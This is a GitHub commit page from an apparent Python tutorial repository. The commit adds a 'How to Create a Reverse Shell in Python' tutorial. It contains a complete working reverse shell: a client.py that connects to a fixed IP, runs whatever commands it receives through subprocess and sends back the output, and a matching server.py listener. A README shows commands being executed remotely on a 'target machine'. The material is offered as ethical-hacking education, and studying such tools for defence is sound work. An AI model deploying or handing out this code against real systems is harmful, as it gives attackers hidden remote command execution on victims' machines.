Commit47907e9

committed

add reverse shell tutorial

1 parent7aaff67 commit47907e9Copy full SHA for 47907e9

File tree

+104

-0

lines changed

+104

-0

lines changed

Lines changed: 1 addition & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -15,6 +15,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy`
`15`	`15`	`-[How to Sniff HTTP Packets in the Network using Scapy in Python](https://www.thepythoncode.com/article/sniff-http-packets-scapy-python). ([code](scapy/http-sniffer))`
`16`	`16`	`-[Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))`
`17`	`17`	`-[Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))`
	`18`	`+-[How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python). ([code](ethical-hacking/reverse_shell))`
`18`	`19`
`19`	`20`	`-###[Machine Learning](https://www.thepythoncode.com/topic/machine-learning)`
`20`	`21`	`-###[Natural Language Processing](https://www.thepythoncode.com/topic/nlp)`

Lines changed: 33 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,33 @@`
	`1`	`+#[How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python)`
	`2`	`+You don't need to install anything.`
	`3`	`+- To run the server, simply write:`
	`4`	+```
	`5`	`+ python server.py`
	`6`	+ ```
	`7`	`+ Output:`
	`8`	+ ```
	`9`	`+ Listening as 0.0.0.0:5003 ...`
	`10`	+ ```
	`11`	`+- Running the client (target machine):`
	`12`	+ ```
	`13`	`+ python client.py`
	`14`	+ ```
	`15`	`+ Output:`
	`16`	+ ```
	`17`	`+ Server: Hello and Welcome`
	`18`	+ ```
	`19`	+- The server will get notified once a client is connected, executing `dir` command on Windows remotely (in `server.py`):
	`20`	+ ```
	`21`	`+ 192.168.1.103:58428 Connected!`
	`22`	`+ Enter the command you wanna execute:dir`
	`23`	`+ Volume in drive E is DATA`
	`24`	`+ Volume Serial Number is 644B-A12C`
	`25`	`+`
	`26`	`+ Directory of E:\test`
	`27`	`+`
	`28`	`+ 09/24/2019 02:15 PM <DIR> .`
	`29`	`+ 09/24/2019 02:15 PM <DIR> ..`
	`30`	`+ 0 File(s) 0 bytes`
	`31`	`+ 2 Dir(s) 89,655,123,968 bytes free`
	`32`	`+ Enter the command you wanna execute:exit`
	`33`	+ ```

Lines changed: 28 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,28 @@`
	`1`	`+importsocket`
	`2`	`+importsubprocess`
	`3`	`+`
	`4`	`+SERVER_HOST="192.168.1.103"`
	`5`	`+SERVER_PORT=5003`
	`6`	`+BUFFER_SIZE=1024`
	`7`	`+`
	`8`	`+# create the socket object`
	`9`	`+s=socket.socket()`
	`10`	`+# connect to the server`
	`11`	`+s.connect((SERVER_HOST,SERVER_PORT))`
	`12`	`+`
	`13`	`+# receive the greeting message`
	`14`	`+message=s.recv(BUFFER_SIZE).decode()`
	`15`	`+print("Server:",message)`
	`16`	`+`
	`17`	`+whileTrue:`
	`18`	`+# receive the command from the server`
	`19`	`+command=s.recv(BUFFER_SIZE).decode()`
	`20`	`+ifcommand.lower()=="exit":`
	`21`	`+# if the command is exit, just break out of the loop`
	`22`	`+break`
	`23`	`+# execute the command and retrieve the results`
	`24`	`+output=subprocess.getoutput(command)`
	`25`	`+# send the results back to the server`
	`26`	`+s.send(output.encode())`
	`27`	`+# close client connection`
	`28`	`+s.close()`

Lines changed: 42 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,42 @@`
	`1`	`+importsocket`
	`2`	`+`
	`3`	`+SERVER_HOST="0.0.0.0"`
	`4`	`+SERVER_PORT=5003`
	`5`	`+`
	`6`	`+BUFFER_SIZE=1024`
	`7`	`+`
	`8`	`+# create a socket object`
	`9`	`+s=socket.socket()`
	`10`	`+`
	`11`	`+# bind the socket to all IP addresses of this host`
	`12`	`+s.bind((SERVER_HOST,SERVER_PORT))`
	`13`	`+# make the PORT reusable`
	`14`	`+# when you run the server multiple times in Linux, Address already in use error will raise`
	`15`	`+s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)`
	`16`	`+s.listen(5)`
	`17`	`+print(f"Listening as{SERVER_HOST}:{SERVER_PORT} ...")`
	`18`	`+`
	`19`	`+# accept any connections attempted`
	`20`	`+client_socket,client_address=s.accept()`
	`21`	`+print(f"{client_address[0]}:{client_address[1]} Connected!")`
	`22`	`+`
	`23`	`+# just sending a message, for demonstration purposes`
	`24`	`+message="Hello and Welcome".encode()`
	`25`	`+client_socket.send(message)`
	`26`	`+`
	`27`	`+whileTrue:`
	`28`	`+# get the command from prompt`
	`29`	`+command=input("Enter the command you wanna execute:")`
	`30`	`+# send the command to the client`
	`31`	`+client_socket.send(command.encode())`
	`32`	`+ifcommand.lower()=="exit":`
	`33`	`+# if the command is exit, just break out of the loop`
	`34`	`+break`
	`35`	`+# retrieve command results`
	`36`	`+results=client_socket.recv(BUFFER_SIZE).decode()`
	`37`	`+# print them`
	`38`	`+print(results)`
	`39`	`+# close connection to the client`
	`40`	`+client_socket.close()`
	`41`	`+# close server connection`
	`42`	`+s.close()`

Comments

(0)